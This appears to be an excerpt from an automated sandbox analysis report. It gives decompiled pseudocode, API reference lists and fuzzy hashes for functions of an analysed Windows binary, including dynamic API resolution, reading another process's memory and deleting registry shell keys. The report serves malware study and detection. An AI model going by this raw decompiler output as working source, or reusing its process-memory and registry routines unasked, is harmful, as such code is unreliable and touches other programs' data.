                                                                                                                • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                0x0040920a
                                                                                                                0x00409218
                                                                                                                0x00409223
                                                                                                                0x0040922c
                                                                                                                0x0040924b
                                                                                                                0x00409253
                                                                                                                0x0040929b
                                                                                                                0x004092e4
                                                                                                                0x0040929d
                                                                                                                0x004092a3
                                                                                                                0x004092b1
                                                                                                                0x004092bd
                                                                                                                0x004092cc
                                                                                                                0x004092d1
                                                                                                                0x004092d8
                                                                                                                0x004092dd
                                                                                                                0x00409255
                                                                                                                0x0040925b
                                                                                                                0x00409269
                                                                                                                0x00409275
                                                                                                                0x00409282
                                                                                                                0x0040928d
                                                                                                                0x00409292
                                                                                                                0x004092ec
                                                                                                                0x004092ef
                                                                                                                0x004092ef
                                                                                                                0x00409231
                                                                                                                0x00409232
                                                                                                                0x00409233
                                                                                                                0x00000000
                                                                                                                0x00409239
                                                                                                                0x0040921a
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409223
                                                                                                                • wcscpy.MSVCRT ref: 00409233
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                  • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                • wcscpy.MSVCRT ref: 00409282
                                                                                                                • wcscat.MSVCRT ref: 0040928D
                                                                                                                • memset.MSVCRT ref: 00409269
                                                                                                                  • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                  • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                • memset.MSVCRT ref: 004092B1
                                                                                                                • memcpy.MSVCRT ref: 004092CC
                                                                                                                • wcscat.MSVCRT ref: 004092D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                • String ID: \systemroot
                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 48%
                                                                                                                			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                                0x00409c73
                                                                                                                0x00409c7c
                                                                                                                0x00409c90
                                                                                                                0x00409c9f
                                                                                                                0x00409ca2
                                                                                                                0x00409ca7
                                                                                                                0x00409ca9
                                                                                                                0x00409cb1
                                                                                                                0x00409cc0
                                                                                                                0x00409cc2
                                                                                                                0x00409cc7
                                                                                                                0x00409ccf
                                                                                                                0x00409cd0
                                                                                                                0x00409cd7
                                                                                                                0x00409cd8
                                                                                                                0x00409cd9
                                                                                                                0x00409cda
                                                                                                                0x00409cdc
                                                                                                                0x00409ce0
                                                                                                                0x00409ce1
                                                                                                                0x00409ce9
                                                                                                                0x00409cf1
                                                                                                                0x00409cfb
                                                                                                                0x00409d08
                                                                                                                0x00409d08
                                                                                                                0x00000000
                                                                                                                0x00409d0d
                                                                                                                0x00409d0f

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                • strlen.MSVCRT ref: 00409CE4
                                                                                                                • strlen.MSVCRT ref: 00409CF1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcstrlen
                                                                                                                • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                • API String ID: 1027343248-2054640941
                                                                                                                • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}


























                                                                                                                0x00401ac9
                                                                                                                0x00401ad1
                                                                                                                0x00401ae1
                                                                                                                0x00401ae7
                                                                                                                0x00401ae9
                                                                                                                0x00401aec
                                                                                                                0x00401c1b
                                                                                                                0x00401af2
                                                                                                                0x00401af2
                                                                                                                0x00401af8
                                                                                                                0x00401b0c
                                                                                                                0x00401b1a
                                                                                                                0x00401bfd
                                                                                                                0x00401b20
                                                                                                                0x00401b26
                                                                                                                0x00401b2b
                                                                                                                0x00401b36
                                                                                                                0x00401b40
                                                                                                                0x00401b43
                                                                                                                0x00401b4a
                                                                                                                0x00401b54
                                                                                                                0x00401b55
                                                                                                                0x00401b56
                                                                                                                0x00401b57
                                                                                                                0x00401b58
                                                                                                                0x00401b63
                                                                                                                0x00401b68
                                                                                                                0x00401b69
                                                                                                                0x00401b77
                                                                                                                0x00401b7d
                                                                                                                0x00401b82
                                                                                                                0x00401b82
                                                                                                                0x00401b88
                                                                                                                0x00401b8b
                                                                                                                0x00401b8e
                                                                                                                0x00401b91
                                                                                                                0x00401b98
                                                                                                                0x00401b9b
                                                                                                                0x00401ba0
                                                                                                                0x00401ba5
                                                                                                                0x00401baa
                                                                                                                0x00401bac
                                                                                                                0x00401bac
                                                                                                                0x00401bb2
                                                                                                                0x00401bb2
                                                                                                                0x00401bbe
                                                                                                                0x00401bc4
                                                                                                                0x00401bc6
                                                                                                                0x00401bc8
                                                                                                                0x00401bc8
                                                                                                                0x00401bd7
                                                                                                                0x00401bee
                                                                                                                0x00401bf0
                                                                                                                0x00401bf0
                                                                                                                0x00401c0e
                                                                                                                0x00401c0e
                                                                                                                0x00401c23

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                • memset.MSVCRT ref: 00401B4A
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                  • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                                • String ID: %d %I64x
                                                                                                                • API String ID: 2567117392-2565891505
                                                                                                                • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                                                0x004045c2
                                                                                                                0x004045d1
                                                                                                                0x004045da
                                                                                                                0x004045ef
                                                                                                                0x004045f6
                                                                                                                0x00404604
                                                                                                                0x0040460b
                                                                                                                0x00404610
                                                                                                                0x00404616
                                                                                                                0x00404617
                                                                                                                0x00404618
                                                                                                                0x00404628
                                                                                                                0x00404629
                                                                                                                0x0040462a
                                                                                                                0x0040462f
                                                                                                                0x00404630
                                                                                                                0x00404631
                                                                                                                0x0040463c
                                                                                                                0x0040463d
                                                                                                                0x0040463e
                                                                                                                0x00404656
                                                                                                                0x00404662
                                                                                                                0x0040466b
                                                                                                                0x0040466d
                                                                                                                0x0040466e
                                                                                                                0x00404674
                                                                                                                0x00404679

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Delete_snwprintfmemset$Close
                                                                                                                • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                • API String ID: 1018939227-3575174989
                                                                                                                • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                0x0040314a
                                                                                                                0x00403151
                                                                                                                0x00403158
                                                                                                                0x0040315a
                                                                                                                0x00403162
                                                                                                                0x00403166
                                                                                                                0x00403190
                                                                                                                0x00403190
                                                                                                                0x00403198
                                                                                                                0x00403199
                                                                                                                0x0040319e
                                                                                                                0x004031bb
                                                                                                                0x004031a0
                                                                                                                0x004031ad
                                                                                                                0x004031b6
                                                                                                                0x004031b6
                                                                                                                0x0040319e
                                                                                                                0x0040316e
                                                                                                                0x00403176
                                                                                                                0x0040317c
                                                                                                                0x0040317f
                                                                                                                0x0040317f
                                                                                                                0x00403182
                                                                                                                0x0040318a
                                                                                                                0x00000000
                                                                                                                0x0040318c
                                                                                                                0x0040318c
                                                                                                                0x00000000
                                                                                                                0x0040318c

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                                0x00404da9
                                                                                                                0x00404dbc
                                                                                                                0x00404dbf
                                                                                                                0x00404dc6
                                                                                                                0x00404dcc
                                                                                                                0x00404dce
                                                                                                                0x00404de1
                                                                                                                0x00404deb
                                                                                                                0x00404df2
                                                                                                                0x00404df4
                                                                                                                0x00404df4
                                                                                                                0x00404e07
                                                                                                                0x00404e0d
                                                                                                                0x00404e18
                                                                                                                0x00404e1c
                                                                                                                0x00404e1e
                                                                                                                0x00404e27
                                                                                                                0x00404e28
                                                                                                                0x00404e29
                                                                                                                0x00404e2f
                                                                                                                0x00404e31
                                                                                                                0x00404e37
                                                                                                                0x00404e41
                                                                                                                0x00404e42
                                                                                                                0x00404e43
                                                                                                                0x00404e46
                                                                                                                0x00404e46
                                                                                                                0x00404e1c
                                                                                                                0x00404e4d
                                                                                                                0x00404e50
                                                                                                                0x00404e5f
                                                                                                                0x00404e66
                                                                                                                0x00404e52
                                                                                                                0x00404e52
                                                                                                                0x00404e52
                                                                                                                0x00404e6d
                                                                                                                0x00404e70
                                                                                                                0x00404e85
                                                                                                                0x00404e85
                                                                                                                0x00000000
                                                                                                                0x00404e72
                                                                                                                0x00404e7b
                                                                                                                0x00404e80
                                                                                                                0x00404e83
                                                                                                                0x00404e87
                                                                                                                0x00404e89
                                                                                                                0x00404e8b
                                                                                                                0x00404e8b
                                                                                                                0x00404ea8
                                                                                                                0x00404ea8
                                                                                                                0x00000000
                                                                                                                0x00404e83

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                • GetWindowRect.USER32 ref: 00404E07
                                                                                                                • GetParent.USER32(?), ref: 00404E12
                                                                                                                • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 2163313125-0
                                                                                                                • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                0x0040639c
                                                                                                                0x004063a4
                                                                                                                0x004063b2
                                                                                                                0x004063c2
                                                                                                                0x004063d3
                                                                                                                0x004063dc
                                                                                                                0x004063eb
                                                                                                                0x004063f0
                                                                                                                0x00406401
                                                                                                                0x00000000
                                                                                                                0x0040641e
                                                                                                                0x0040641f

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                • wcscpy.MSVCRT ref: 004063B2
                                                                                                                • wcscpy.MSVCRT ref: 004063C2
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                  • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
